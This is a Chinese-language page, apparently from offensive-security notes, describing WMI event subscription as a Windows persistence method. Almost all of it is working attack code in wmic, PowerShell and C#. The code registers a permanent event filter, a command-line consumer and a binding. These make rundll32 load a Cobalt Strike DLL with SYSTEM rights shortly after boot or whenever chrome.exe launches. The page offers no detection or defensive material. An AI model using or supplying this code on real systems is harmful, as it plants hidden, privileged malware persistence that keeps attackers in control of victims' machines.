WMI事件
WMI事件
WMI事件,是特定对象的属性发生改变时发出的通知,其中包括增加、修改、删除三种类型。可以使用wmic命令来修改。
利用代码
命令行:
#注册一个事件过滤器,该过滤器是开机2分钟到2分半钟,由于是永久WMI事件订阅,故需要管理员权限,最终获取到权限也是system权限
wmic /NAMESPACE:"\\root\subscription"PATH__EventFilterCREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150"
#注册一个事件消费者,这里写入了要执行的命令,是用 rundll32 启动 cs 的 dll
wmic /NAMESPACE:"\\root\subscription"PATHCommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\Temp\qwqdanchun.dll"
#绑定事件 过滤器和事件消费者
wmic /NAMESPACE:"\\root\subscription"PATH__FilterToConsumerBindingCREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""Powershell:
$wmiParams = @{
NameSpace = 'root\subscription'
}
# Creating a new event filter
$wmiParams.Class = '__EventFilter'
$wmiParams.Arguments = @{
Name = 'BugSecFilter'
EventNamespace = 'root\CIMV2'
QueryLanguage = 'WQL'
Query = "select * from __InstanceCreationEvent within 5 where targetInstance isa 'Win32_Process' and TargetInstance.Name = 'chrome.exe'"
}
$filterResult = Set-WmiInstance @wmiParams
# Creating a new consumer
$wmiParams.Class = 'CommandLineEventConsumer'
$wmiParams.Arguments = @{
Name = 'BugSecConsumer'
CommandLineTemplate = "cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"
}
$consumerResult = Set-WmiInstance @wmiParams
# Bind filter to consumer
$wmiParams.Class = '__FilterToConsumerBinding'
$wmiParams.Arguments = @{
Filter = $filterResult
Consumer = $consumerResult
}
Set-WmiInstance @wmiParamsC#:
using System;
using System.Text;
using System.Management;
namespace WMIPersistence
{
class Program
{
static void Main(string[] args)
{
PersistWMI();
}
static void PersistWMI()
{
ManagementObject myEventFilter = null;
ManagementObject myEventConsumer = null;
ManagementObject myBinder = null;
String CommandLine = @"cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll";
String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
"WHERE TargetInstance ISA \"Win32_Process\" " +
"AND TargetInstance.Name = \"chrome.exe\"";
try
{
ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
ManagementClass wmiEventFilter = new ManagementClass(scope, new ManagementPath("__EventFilter"), null);
WqlEventQuery myEventQuery = new WqlEventQuery(strQuery);
myEventFilter = wmiEventFilter.CreateInstance();
myEventFilter["Name"] = "BugSecFilter";
myEventFilter["Query"] = myEventQuery.QueryString;
myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
myEventFilter["EventNameSpace"] = @"\root\cimv2";
myEventFilter.Put();
myEventConsumer = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null).CreateInstance();
myEventConsumer["Name"] = "BugSecConsumer";
myEventConsumer["CommandLineTemplate"] = CommandLine;
myEventConsumer.Put();
myBinder = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
myBinder["Filter"] = myEventFilter.Path.RelativePath;
myBinder["Consumer"] = myEventConsumer.Path.RelativePath;
myBinder.Put();
}
catch (Exception e)
{
Console.WriteLine(e);
}
Console.ReadKey();
}
}
}参考文章:
最后更新于